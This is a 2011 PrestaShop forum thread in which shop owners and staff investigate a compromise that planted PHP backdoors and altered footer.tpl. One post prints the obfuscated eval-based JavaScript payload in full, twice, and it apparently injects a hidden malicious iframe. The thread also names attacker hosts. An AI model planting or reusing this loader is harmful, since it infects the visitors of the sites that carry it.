Footer.tpl vulnerability?

[Xenocide]

This is one of my live site's that's been hacked. Hacker's IP was: 91.143.79.106

 

This is the access logs grepped for that IP:

 

/themes/<mytheme>/footer.tpl was modified

/download/ had a php file with a filename that looked like an md5 string

/upload/ had a php file with a filename that looked like an md5 string

/tools/smarty_v2 was deleted (Deleted whole folder)

/tools/smarty was modified

NO /modules/her.php

 

Oh, to add the files that were created had a modified time of 04:31

 

Have you checked your IP?

(myip.dk)

 

Yes I have, I'm trying to get the other shop admin to check theirs.

 

Interestingly they're using a mac so the idea of malware on the machine may not work. (You can see the UA in the logs)

[ruilong]

I work for a hosting company and have been trying to track this down. The her.php file is accessed via an ajax request and contains the code in the first page of this thread, which downloads the malicious files to upload/ and download/ then deletes the smarty folders and emails admin login data to the attacker.

 

I can't find what creates her.php initially but in every instance I've seen, it immediately follows an admin login and a click of an admin tab button. Because it's done via ajax that implies the code in footer.tpl is the source, but I can't find how this is created.

 

To prevent the attack I've put in place an auto_prepend_file which simply does a mail() of $_SERVER then calls die() if it detects it's the her.php file which is being executed, but this is only stopping the effect rather than the cause.

 

One theory I have is that it's a virus on the Prestashop administrator's PC which is using the admin area to edit templates (because it always picks the right template rather than doing all templates) and then that code is subsequently called on the next page view. All attacks have a POST to /adminfolder/ajax.php, then on the next request for a tab her.php is subsequently called, for example:

 

ip - - [24/Aug/2011:08:53:52 +0100] "POST /shop/admin123/ajax.php HTTP/1.1" 200 20 "http://www.site.net/shop/admin123/"

ip - - [24/Aug/2011:08:53:53 +0100] "POST /shop/admin123/index.php?tab=AdminModules&token=a088c4e2726917d74b2635984e6af501 HTTP/1.1" 200 20085 "http://www.site.net/shop/admin123/"

ip - - [24/Aug/2011:08:53:54 +0100] "GET /shop/modules/her.php HTTP/1.1" 200 20 "http://www.site.net/shop/admin123/"

 

In terms of tracking down activity I'd possibly advise adding code which mails / logs the contents of $_POST and $_SERVER on every request to /adminfolder/index.php and /adminfolder/ajax.php as that should give a clue as to what's happening, but the niggle is it still doesn't explain how the content (which causes the malicious GET) was added to footer.tpl.

 

it's a POST to adminModules tab (not a click), so it's probobly posting a url to download a module from, this zip/tar file is then extracted to the modules folder with the her.php file.

then a call to her.php is made to execute the script.

as for the footer.tpl, this file should not be write able unless the theme was uploaded through the theme installator (then the apache process would own the files in the theme folder).

[designguy79]

One theory I have is that it's a virus on the Prestashop administrator's PC which is using the admin area to edit templates

 

That would be quite the trick; I am using OSX 10.6.8 and have Kaspersky Anti-virus, and I know others having problems are on Windows.

 

Can anyone else chime in who is using Ubuntu or something?

[fraolsmae]

We were affected as well. v1.4.3.

 

This is bad!!

 

I have a earlier backup of the database and the shop.

 

I tried to take the last backup, and then delete older database and import older database, but this didnt help.

 

Tips to how i should to this right?

 

Frank

[Carl Favre]

Hi everyone,

 

Some good news!

 

The problem has been fixed. It will not spread anymore.

 

For those who have had this issue, please contact us at: [email protected]

 

For now we are working on a fix so you can easily remove all the infected files.

 

We will give more information a bit later.

 

From all the Team, thanks again for your cooperation and patience.

[thehandlestudio]

Is there any chance of an update from the PS developers please?

 

Regards,

 

Mark.

 

Edit, sorry you beat me to it....

[Burhan BVK]

To prevent this attack you can add the following line to your htaccess file:

 

RewriteRule ^modules/her.php(.*)$ 404.php [QSA,L]

 

With this, even if her.php is created, it is never executed.

 

From what I read so far, this seems like a javascript exploit on the back office page. I think some javascript code is using your own session to upload her.php to your server.

[Xenocide]

Cheers Carl - I've just emailed you

[Carl Favre]

Thanks .

[Kamel Boukhateb]

To prevent this attack you can add the following line to your htaccess file:

 

RewriteRule ^modules/her.php(.*)$ 404.php [QSA,L]

 

With this, even if her.php is created, it is never executed.

 

From what I read so far, this seems like a javascript exploit on the back office page. I think some javascript code is using your own session to upload her.php to your server.

 

This is useless now. We fixed it and as we said, it won't spread anymore.

However there's still the problem of thoses already infected. Try to change all passwords of your shop or contact us at : [email protected]

[jesusruiz]

That's fast troubleshooting. If the world were controlled by the people of Prestashop, would be perfect.

 

Carl, thanks to you, and all the team Prestashop.

[Xenocide]

Best to move your admin panel too if the information has been transmitted back to someone else too, no?

[manouille]

Hi everyone,

 

Some good news!

 

The problem has been fixed. It will not spread anymore.

 

For those who have had this issue, please contact us at: [email protected]

 

For now we are working on a fix so you can easily remove all the infected files.

 

We will give more information a bit later.

 

From all the Team, thanks again for your cooperation and patience.

 

strange files on upload and download directory.

 

Is there another ?

 

Sorry for bad english !

[Xenocide]

strange files on upload and download directory.

 

Is there another ?

 

Sorry for bad english !

 

/upload/?.php

/download/?.php

/modules/her.php

/themes/<themename>/footer.tpl code removal

and the files to fix the exploit, I guess.

[manouille]

Clear cache may be ?

[Raphaël Malié]

You should also change your employees accounts passwords, and if possible your mysql password, this is always a good precaution to take after these kind of issues.

 

Regards

[randori]

Email sent! Hopefully it will work!

[indus]

I sent email to [email protected] .

 

I change admin password , i dont have other employees.

 

But i dont know how to change sql passwords.Iam on shared hosting.Can i change it from back office under database?

 

This changes the password for the database user isnt it?

 

Iam also eagerly waiting to hear how this whole thing happened.

[emilioSH]

I sent email too.

[das-schaf]

i am also infected, what should i do?

 

i deleted the her.php, change all passwords and removed the code in the footer.

 

thx

tobi

[indus]

I dont understand what deleting these files does to solve the original problem.

 

If this happened before, then it can be created again whether you change your passwords or not.

[Raphaël Malié]

Hello Indus, you should contact your host provider to ask him to change your mysql password, then set the new password in your config/settings.inc.php file.

[[PrestaModule] JS]

Hi,

 

I contacted the webmaster of http://www.c2bill.it/ asking him to remove the files "http://www.c2bill.it/stest/chkpnt/shell.txt" and "http:// www.c2bill.it/stest/chkpnt/sdata.php ".

He did it a few hours there. Hope this may slow attacks

[feltu]

Hi

 

we have over 10,000 members and orders in our prestashop database

I have sent you an email, please help urgently

 

thanks

[Raphaël Malié]

Hello [PrestaModule] JS, really thank you for your help ! And as Carl said before the problem is now totally fixed, don't forget to contact [email protected] if you were infected and need help + informations.

 

Best regards

[hege]

fyi

 

There was an attack on my site at 08.23 18:21 and than I:

- removed the files, replaced footer.tpl,

- updated the employees passwd

- changed the directiory of the admin page

- removed the "send attachment" on the contact

- added tpl protection in the htaccess

- changed the ftp and qsl passwords

- commented out the extractarchive in the admin module (changed might be after the second hack)

 

now i found the her.php at ten o'clock, but nothing else found... (no new file, no modification...)

 

regards,

Gabor

[[PrestaModule] JS]

Hi Raphaël,

 

Thanks you and all PrestaTeam for quick fix. We've allready sent an email to [email protected].

 

Regards

[shacker]

i use the rsi protect module to protect tpl files, and dont let htaccess file with write permissons

[MokaDev]

Hi, Prestashop Team

 

i send an email to [email protected] when do you think we'll receive the fix?

 

best regards

[AKJV]

Dear Prestashop developers,

 

I've also sent out an email to the aforementioned email address and am eagerly awaiting for more info.

 

But in the meantime, could you at least tell us whether the permanent resolution to this issue implies a soon to be released update to some Prestashop files? Or is it something that was fixed from your end so that uninfected installations do not have to worry about future infections?

 

This info will put uninfected users at ease (well, that is when no update needs to be applied).

[Metameme]

I helped Philee with his store and we also found that additional IP addresses had been added to the maintenance IP-field.

Might be good to check that as well...

[hege]

Hi, Prestashop Team

 

i send an email to [email protected] when do you think we'll receive the fix?

 

best regards

 

I think in minutes... but lot of people have sent a mail to them.

as [PrestaModule] JS said, the page where the malicious code sent the site information is no longer available.

so don't panic

 

Thanks for the ps team and other guys to solve this issue so fast...

[henric]

I just got my site back to Vidahost family had tried to replace the tools and I still had problems with the security access error page was becoming a web browser.

[indus]

Hi

 

I just noticed taht my smarty cache and compile folders had 771 permissions.I changed it to 755.Not sure if this is related though.

[feltu]

Dear Prestashop

 

been sitting infront of pc for past hour

waiting email to be replied

hope that solution can be replied asap

 

thanks

[jcerdan]

Hi,

 

I've bben hacked too.

changed the footer.tpl and deleted files from upload/ and download/

 

Hope to see a security fix soon!

 

Anyway, is there a doc describing security actions to take when installing a new Presatshop? Folder permissions, files permission, etc...

[LinnB]

I got this google warning right after writing "prestashop malware" in google, as i just got the same message with my website.

 

what's going on??

[spidermax]

I was infected

 

Had the extra download files well two extra so there deleted

 

footer.tpl had extra added to it so have removed that, just waiting on [email protected] to get back to me to tell me if i have to change anything else.

 

hope every one get sorted. i found removing the extra code(at the bottom of post) from the footer.tpl file stopped the virus warnings.

 

{literal}<script>String.prototype.asd=function(){return String.fromCharCode;};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){zxc={}[i];}v=document.createTextNode('asd');var s="";for(i in v)if(i=='childNodes')o=v[i].length+1;o*=2;e=eval;m=[120-o,99-o,116-o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,34-o,122-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-o,99-o,118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o,42-o,102-o,48-o,105-o,103-o,118-o,70-o,99-o,118-o,103-o,42-o,43-o,49-o,52-o,43-o,45-o,59-o,57-o,43-o,61-o,34-o,120-o,99-o,116-o,34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o,103-o,118-o,74-o,113-o,119-o,116-o,117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o,119-o,111-o,103-o,112-o,118-o,48-o,121-o,116-o,107-o,118-o,103-o,42-o,36-o,62-o,107-o,104-o,116-o,99-o,111-o,103-o,34-o,117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-o,60-o,49-o,49-o,101-o,110-o,107-o,101-o,109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,107-o,110-o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,41-o,34-o,121-o,107-o,102-o,118-o,106-o,63-o,50-o,34-o,106-o,103-o,107-o,105-o,106-o,118-o,63-o,50-o,64-o,36-o,43-o,61-o];mm=''.asd();for(i=0;i<m.length;i++)s+=mm(e("m"+"["+"i"+"]"));e(s);</script>{/literal}                                     {literal}<script>String.prototype.asd=function(){return String.fromCharCode;};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){zxc={}[i];}v=document.createTextNode('asd');var s="";for(i in v)if(i=='childNodes')o=v[i].length+1;o*=2;e=eval;m=[120-o,99-o,116-o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,34-o,122-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-o,99-o,118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o,42-o,102-o,48-o,105-o,103-o,118-o,70-o,99-o,118-o,103-o,42-o,43-o,49-o,52-o,43-o,45-o,59-o,57-o,43-o,61-o,34-o,120-o,99-o,116-o,34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o,103-o,118-o,74-o,113-o,119-o,116-o,117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o,119-o,111-o,103-o,112-o,118-o,48-o,121-o,116-o,107-o,118-o,103-o,42-o,36-o,62-o,107-o,104-o,116-o,99-o,111-o,103-o,34-o,117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-o,60-o,49-o,49-o,101-o,110-o,107-o,101-o,109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,107-o,110-o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,41-o,34-o,121-o,107-o,102-o,118-o,106-o,63-o,50-o,34-o,106-o,103-o,107-o,105-o,106-o,118-o,63-o,50-o,64-o,36-o,43-o,61-o];mm=''.asd();for(i=0;i<m.length;i++)s+=mm(e("m"+"["+"i"+"]"));e(s);</script>{/literal}

[MokaDev]

I got this google warning right after writing "prestashop malware" in google, as i just got the same message with my website.

 

what's going on??

 

 

WTF??

 

if prestashop.com is infected maybe the problem come's from the back office wich contact some prestashop's urls.

 

that will explain why i noticed in the apache access log that the her.php file was created and accessed few seconds after my customer logs in the back office.

 

that't will explain why prestashop security team does not respond to our mails?

[Metameme]

People, do please read the full thread before asking questions.

 

//Mike

[titooooom]

I am using linux and windows.

 

I'm curious for those infected what operating system you use ?

 

I'm working on OSX 10.5.8

and for hosting this is Linux Apache/2.2.14 (Unix) PHP: 5.2.5 MySQL: 5.1.44

 

 

Thanks

[MokaDev]

I got this google warning right after writing "prestashop malware" in google, as i just got the same message with my website.

 

what's going on??

 

 

WTF??

 

if prestashop.com is infected maybe the problem come's from the back office wich contact some prestashop's urls.

 

that will explain why i noticed in the apache access log that the her.php file was created and accessed few seconds after my customer logs in the back office.

 

that't will explain why prestashop security team does not respond to our mails?

 

hehe that will explain why the local version of the shop (on a dev server) is infected too...

[shacker]

I got this google warning right after writing "prestashop malware" in google, as i just got the same message with my website.

 

what's going on??

 

this is the attached file, that is the malware, not the prestashop.com

[treebeard]

A customer of us was hacked, too. We removed all malicous code from footer.tpl, etc. and sent an email to [email protected]

 

But please explain: what caused the infection in Back Office? Please give us more details.

 

For our german customers we are translating and summarizing this issue on http://www.prestashop-tutorials.de/sicherheitsluecke-prestashop-1-4/

[Xenocide]

I got this google warning right after writing "prestashop malware" in google, as i just got the same message with my website.

 

what's going on??

 

 

WTF??

 

if prestashop.com is infected maybe the problem come's from the back office wich contact some prestashop's urls.

 

that will explain why i noticed in the apache access log that the her.php file was created and accessed few seconds after my customer logs in the back office.

 

that't will explain why prestashop security team does not respond to our mails?

 

hehe that will explain why the local version of the shop (on a dev server) is infected too...

 

It certainly would, might also explain why prestashop.com wasn't loading properly earlier and why the dev team was able to just say "we've stopped it and it won't happen again" without issuing any code changes.

 

I don't really mind that much, it's a honest mistake. But i'd like to know what the vunerability was either way.

[indus]

I got this google warning right after writing "prestashop malware" in google, as i just got the same message with my website.

 

what's going on??

 

 

WTF??

 

if prestashop.com is infected maybe the problem come's from the back office wich contact some prestashop's urls.

 

that will explain why i noticed in the apache access log that the her.php file was created and accessed few seconds after my customer logs in the back office.

 

that't will explain why prestashop security team does not respond to our mails?

 

hehe that will explain why the local version of the shop (on a dev server) is infected too...

 

It certainly would, might also explain why prestashop.com wasn't loading properly earlier and why the dev team was able to just say "we've stopped it and it won't happen again" without issuing any code changes.

 

I don't really mind that much, it's a honest mistake. But i'd like to know what the vunerability was either way.

Probably comes from the videos and news links on the back office page.

[StanRow]

According to what I could read on the french forum, the issue comes from the RSS feed displayed right after the adminsitrator's login.

They fixed the feed, therefore stopped the propagation of the malware/virus.

[Carl Favre]

Hi,

 

Right now, we are writing a more detailed answer explaining the causes and what to do to fix your shop.

 

Please, be a little more patient, just to give us the time to write a comprehensive answer for all of you.

 

Be assured that so far the issue is fixed and cannot be spread anymore.

 

Thanks again for your patience.

[phrasespot]

if prestashop.com is infected maybe the problem come's from the back office wich contact some prestashop's urls.

This is actually not a bad assessment as to what may have been wrong, seeing the prevalence of the localhost infections.

 

Even if it was not, there is at least half a dozen places in the code where the content from prestashop.com is pulled and every single installation is out there is at the mercy of how security of the prestashop.com and its subdomains.

 

I understand the wish to collect stats/referrer points/affiliate credits etc but Prestashop should seriously reconsider including code that pulls stuff from other domains including their own. Any security conscience admin removes those sections from the code as soon as it is installed anyway. The alternative is that a situation like this one may arise anytime.

 

Just my two cents.

[Xenocide]

Cool thanks for the answer Carl.

[fancydressqueen]

Were in the same boat, hoping for a solution asap!

[BODYL]

Also happening in 1.4.4

Are they news about patch ?

URGENT !!!

[indus]

Also happening in 1.4.4

Are they news about patch ?

URGENT !!!

 

 

Yes.For now, just delete the strange php files in upload and download folders and delete the javascript inside footer.tpl in themes.

 

Also change admin back office login and the database passwords.Because the exploit seems to read the settings.inc.php file which has those details.

[BODYL]

Thanks

[christmascrackers]

I've removed the files and updated the footer.tpl as instructed. But my site is being flagged by Avast as infected by a trojan:

 

Infection Details

 

URL: http://clickmemq.fileave.com/

Process: file://C:\Program Files\Mozilla Firefox\...

Infection: js:Redirector-IY [Trj]

Warn your friends to avoid this website

 

Nice of them to put a twitter button there for everyone to tweat to avoid my site. I'm assuming this is related to the virus which was on my shop.

 

Anyone have any suggestions why this malware is still present depsite me removing everything as instructed.

[AKJV]

I've removed the files and updated the footer.tpl as instructed. But my site is being flagged by Avast as infected by a trojan:

 

Infection Details

 

URL: http://clickmemq.fileave.com/

Process: file://C:\Program Files\Mozilla Firefox\...

Infection: js:Redirector-IY [Trj]

Warn your friends to avoid this website

 

Nice of them to put a twitter button there for everyone to tweat to avoid my site. I'm assuming this is related to the virus which was on my shop.

 

Anyone have any suggestions why this malware is still present depsite me removing everything as instructed.

 

Did you do a 'Force compile' and cleared the cache after restoring you footer.tpl?

[dazzza]

The infected footer.tpl file will still reside in tools > smarty > compile.

Delete it from there as well!!

 

And replace the affected/deleted files BEFORE changing your admin & sql password, or when you login to BO the virus will send your login details AGAIN.

[christmascrackers]

As soon as I sent this I remembered the cache needed clearing and it's worked, thanks.

[kvnkain]

I found this I was also infected

this is some kind of Institute as prestashop hackiar look!.

http://pastebin.com/q5Dz0gKt

[lucass]

does this injection anyhow threatens customers computers? or admin computers? Or, is it only on server side?

[tobes]

I too have suffered this, on two sites.

 

One is still down as the permissions on the /modules/ folder seem to have been changed, and I'm waiting for an admin to fix that.

 

Looking forward to hearing more about the causes of this and the steps necessary to prevent it happening again.

 

If there's anything in the logs which would still be useful to anyone, let me know.

 

--Toby

[LinnB]

I've removed the files and updated the footer.tpl as instructed. But my site is being flagged by Avast as infected by a trojan:

 

Infection Details

 

URL: http://clickmemq.fileave.com/

Process: file://C:\Program Files\Mozilla Firefox\...

Infection: js:Redirector-IY [Trj]

Warn your friends to avoid this website

 

Nice of them to put a twitter button there for everyone to tweat to avoid my site. I'm assuming this is related to the virus which was on my shop.

 

Anyone have any suggestions why this malware is still present depsite me removing everything as instructed.

 

I went to your site and Norton detected an attack from vipaquarium.ka.hn, the same happened when I went on my site.

[chemapresta]

Hello, can you search in your full log apache the word "her.php" and copy all found lines here ? If you are under linux :

cat /path/to/your/apache/log | grep "her.php"

 

ok, here you are...

 

###

logs$ cat apache.log | grep "her.php"

213.98.113.74 - - [23/Aug/2011:15:06:01 +0200] "GET /tienda/modules/her.php HTTP /1.1" 200 277 "https://myshop.com/tienda/admin123/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0.1) Gecko/20100101 Firefox/5.0.1" 1221

###

[dazzza]

does this injection anyhow threatens customers computers? or admin computers? Or, is it only on server side?

 

I think it's a server side problem on the whole. But if you're running test sites or building templates on a localhost server like wamp or xampp it'll be on your PC.

[Xenocide]

The vunerbility delivered a payload of a malware site in an iframe on the "front office" section of your site so it's possible something was installed on anyone's machine who was visiting your site.

 

Edit: vv It's been confirmed to have been the RSS feed in the admin panel loaded from prestashop.com vv

[dazzza]

It seems to have only affected 1.4.3 & 1.4.4 so it must of been something that was added in 1.4.3

"Add my IP"

or

Layered module

 

 

####################################

# v1.4.3.0 - 7119 (2011-06-16) #

####################################

 

Added Features:

 

[+] Installer : Refuse to index the page by robots

 

[+] BO : Added button "Add my IP"

[+] BO : Adding pagination to the customers list

[+] BO : added the option to move product images to the new filesystem

 

[+] Classes : added manufacturer name and id in ProductSale::getBestSales();

[+] Classes : added manufacturer name and id in ProductSale::getBestSales(); without sql error

 

[+] MO : MondialRelay, add fields personalization and fix js

[+] MO : Refactoring Module dejala and LiveZilla

[+] MO : layered module - real time URL building (ability to give the URL to someone)

[Julien Breux]

It's just a little tools to help you.

 

https://github.com/jbreux/psauditor/

[indus]

Ok i notice 1 problem now, my theme does not appear in backoffice>appearance>themes

 

Anyone else have this problem?

[designguy79]

Has anyone who sent a request to [email protected] received more details yet? I sent them a message about 3 1/2 hours ago and have not heard anything!

[GTSTech]

I've not had a reply either designguy79

 

I think they're taking precautions since the hacker could be on the forum and could potentially find a way around their fix!!

 

 

Is there anyway to disable the prestashop news feed appearing in our backend as I read in this thread that had something to do with the hack being downloaded in the first place.

[istox]

I'm not received answer. for 6 hours.

 

Please can someone say how to disable link to prestashop.com from back office. Because when prestashop.com will be down yours back office will be down too.

[indus]

I'm not received answer. for 6 hours.

 

Please can someone say how to disable link to prestashop.com from back office. Because when prestashop.com will be down yours back office will be down too.

 

 

Same here.Havent received any email.Maybe they should email every member on the forum.Some of them might still not have noticed.

[Nebojsa Stojanovic]

Hi,

 

We'll post the procedure and the fix in a few minutes.

I'll update you very soon.

 

Regards

[fancydressqueen]

Hi,

 

We'll post the procedure and the fix in a few minutes.

I'll update you very soon.

 

Regards

 

Excellent, thanks for the update....on the update...if that makes sense.

[Ehinarr]

In my particular case, all these files and modifications appeared after I enabled the webservice. Is that relevant?Anyway, just in case, I have disabled the webservice.

[shacker]

you can remove in admintabs.php, in tabs folder of admin, entire column div <div id="column_right"> on line 389 to 429

[chemapresta]

It seems to have only affected 1.4.3 & 1.4.4 so it must of been something that was added in 1.4.3

"Add my IP"

or

Layered module

 

 

####################################

# v1.4.3.0 - 7119 (2011-06-16) #

####################################

 

Added Features:

 

[+] Installer : Refuse to index the page by robots

 

[+] BO : Added button "Add my IP"

[+] BO : Adding pagination to the customers list

[+] BO : added the option to move product images to the new filesystem

 

[+] Classes : added manufacturer name and id in ProductSale::getBestSales();

[+] Classes : added manufacturer name and id in ProductSale::getBestSales(); without sql error

 

[+] MO : MondialRelay, add fields personalization and fix js

[+] MO : Refactoring Module dejala and LiveZilla

[+] MO : layered module - real time URL building (ability to give the URL to someone)

 

No, I'm using PS v1.4.1.0 and I am also affected.

[dazzza]

It seems to have only affected 1.4.3 & 1.4.4 so it must of been something that was added in 1.4.3

"Add my IP"

or

Layered module

 

 

####################################

# v1.4.3.0 - 7119 (2011-06-16) #

####################################

 

Added Features:

 

[+] Installer : Refuse to index the page by robots

 

[+] BO : Added button "Add my IP"

[+] BO : Adding pagination to the customers list

[+] BO : added the option to move product images to the new filesystem

 

[+] Classes : added manufacturer name and id in ProductSale::getBestSales();

[+] Classes : added manufacturer name and id in ProductSale::getBestSales(); without sql error

 

[+] MO : MondialRelay, add fields personalization and fix js

[+] MO : Refactoring Module dejala and LiveZilla

[+] MO : layered module - real time URL building (ability to give the URL to someone)

 

No, I'm using PS v1.4.1.0 and I am also affected.

 

Thanks for that chemapresta. I didn't realise is went back that far, I'll have to dig a bit deeper.

[chemapresta]

Has anyone who sent a request to [email protected] received more details yet? I sent them a message about 3 1/2 hours ago and have not heard anything!

 

Nothing yet.

[Ehinarr]

And deleted all new files...

[dazzza]

I've left the files in place on a project i'm working on for a client. Now if the hacker knows the admin address of the site & the login details & tries to access it, when they hit "log in" instead of logging in, it sends them a virus

[tobes]

It seems to have only affected 1.4.3 & 1.4.4 so it must of been something that was added in 1.4.3

"Add my IP"

or

Layered module

 

No, I'm using PS v1.4.1.0 and I am also affected.

 

1.4.2.5 for me on both my sites. I too am waiting to hear back from the support email address.

[Adalid_Negro]

I've left the files in place on a project i'm working on for a client. Now if the hacker knows the admin address of the site & the login details & tries to access it, when they hit "log in" instead of logging in, it sends them a virus

}

Just change the name of the administrator folder...

 

 

www.promutual-eat.com/s/

[dazzza]

My PrestaShop 1.5 test site seems to be unaffected so far. Checked footer.tpl, smarty files, modules, database & apache logs. Nothing.

[indus]

..........

[Mike Kranzler]

Hello everybody,

First of all, thank you for your information and knowledge as we worked on closing this hole.

 

We have officially secured this footer.tpl vulnerability and created a guide for quickly and easily fixing it in your shop.

 

You can find that guide here: http://www.prestashop.com/forums/topic/126114-please-read-security-procedure/

 

Again, thank you so much for your patience as we researched and applied this fix. The information you posted and emailed to us was invaluable when it came to speeding up the process.

 

If you have any additional questions, please do not hesitate to email us, but please be sure to try our suggestions here first.

 

Thanks again, and happy selling!

 

-Mike

[thehandlestudio]

Thank you Mike.

 

Regards,

 

Mark.

[plextor-online]

thx Prestashop team

 

for your hard work to fix this problemm...

[geckoWebdesign]

Thank you ! Merci !

[fireman28]

Thanks!! My Avast Antivirus has been giving warnings for a couple of weeks, and it is now that I realise what was going on. Won't ignore it again!!

 

I thought I had messed my Theme yesterday when all carousels and a slider went mad.

 

I wonder why a news service was capable of giving access to download files and who knows what else...perhaps we should be allowed to opt-out in the future? Apart of money, we are loosing credibility with our customers.

 

Anybody knows what was the intention of such hack? What did the injected code do?

 

I thank again for everybody's efforts to bring this into control

 

Al

[PurpleEdge]

if prestashop.com is infected maybe the problem come's from the back office wich contact some prestashop's urls.

This is actually not a bad assessment as to what may have been wrong, seeing the prevalence of the localhost infections.

 

Even if it was not, there is at least half a dozen places in the code where the content from prestashop.com is pulled and every single installation is out there is at the mercy of how security of the prestashop.com and its subdomains.

 

I understand the wish to collect stats/referrer points/affiliate credits etc but Prestashop should seriously reconsider including code that pulls stuff from other domains including their own. Any security conscience admin removes those sections from the code as soon as it is installed anyway. The alternative is that a situation like this one may arise anytime.

 

Just my two cents.

 

I agree 100% - this is a perfect example of the risk. Contacting head office for the latest news seems like a neat feature in a cms, but it is obviously a feature which requires constant vigilance.

 

Congratulations to PS for identifying the cause so quickly - now to prevent it happening again!

[PurpleEdge]

It's just a little tools to help you.

 

https://github.com/jbreux/psauditor/

 

Hi Julien,

 

Can you please post a little bit more information about what this is and how to use it?

[feltu]

Dear Prestashop Team,

 

thank you for fixing the problem

the hack had cost us alot of troubles on our 2 prestashop sites

 

I need to know some extra information.

 

-Is 1.4.4 ver. safe to upgrade?

-Will there be a new 1.4.x upgrade coming soon that covers this problem?

-Are we still safe to use the Upload function from the contact form after applying the herfix patch?

-Is there any chance that the password that we entered under the PayPal module has been sent to the hacker too?

-Are the email / personal info from the customer database being sent to the hacker?

 

we need to know answers to above urgently.

 

thank you

Cyril

[Takada]

Hello,

 

Something's missing, what is the risk for people who were infected on their local install? As there often is no password for mysql...

[goodboy88]

Me too get infected.

 

How can they upload or inject those code on my server since it is password protected? Anyone know?

[makaraci]

hi guys, i use 1.3.1 version of prestashop.I wonder if my site may be infected ?

[Carl Favre]

Hi makaraci,

 

It only concernes 1.4.x versions of PrestaShop.

[makaraci]

Hi makaraci,

 

It only concernes 1.4.x versions of PrestaShop.

 

Thanks Carl.I'm relaxed .

[Nebojsa Stojanovic]

Hi everybody,

 

First of all, I want to thank the PrestaTeam and the Community who were able to mobilize yesterday to correct the problem in just a few short hours.

I took the time to read each and every one of your posts, and I want to bring you as much information as possible to all your questions.

 

1. As soon as we became aware of the fault, we began by searching for the origin. We contacted several storefront owners who had found the problem, they gave us access, and together we tried to reproduce it on multiple machines in-house. We identified several possibilities:
   
   1. 
      
   2. A security vulnerability in the Prestashop software that allowed the injection of malicious script on the shops.
      
   3. A trojan that modifies the script before sending FTP.
      
   4. A trojan recovering FTP access and allowing another script to change the solution.
      
   5. A security vulnerability in the software on the servers.
      

And we finally managed to find the answer: the issue was with our website, www.prestashop.com.

So we started by correcting the problem on prestashop.com, blocking the attack, and then we split the team in three:

1. A team to more precisely analyze what the script was exactly to assess the damage;
   
2. A team to create the sets, and test it on several shops affected;
   
3. Another team was responsible for verifying the PrestaShop server in depth, to lock the server and trace it back to the origin of the hack to recover information as possible so that we can file an official report.
   

[*]Yes, www.PrestaShop.com has been compromised, allowing an attacker to exploit a script injection site and, as a result, another script on the remote stores.

[*]This "loophole" is because we do not verify information from our own site in terms of the software. This design flaw is fixed with the patch that we provided you yesterday. This patch fixes the problem and protects your store from future attacks.

[*]The software is completely secure as I am writing this, and the malicious script was offset yesterday afternoon around 7:00 a.m. Eastern Time.

[*]The consequences for the shops affected are:

1. The script get your access to the database and a table "Employees", and sent by mail to an anonymous address, which is why we have asked you to change the password for your database and the password for all your employees in the back office of your store.
   
2. The script added several points of entry ("backdoors") in the download and upload directories, to browse the directory of your store; these scripts are deleted by the patch.
   
3. The script removed the directory tools/smarty_v2; this directory is recreated by the patch.
   
4. The direct consequence is, for now, a temporary suspension of your site, until the application of security patches.
   

[*]What to do:

1. it is essential to quickly and apply the security patch if you have been affected because data is still vulnerable,
   
2. If you have not been affected , you should apply the security patch as a preventative measure.
   

The whole team PrestaShop is listening to you and we are at your disposal for any questions. We are actively working to respond to you individually today to help resolve any problems.

Yours.

[Mike Kranzler]

Thank you Nebosja, I know you and the rest of the team have worked very hard on this. I am going to close this thread, but for any additional questions or comments you may have, please visit the thread where we have published the fix, which you can find here.

 

-Mike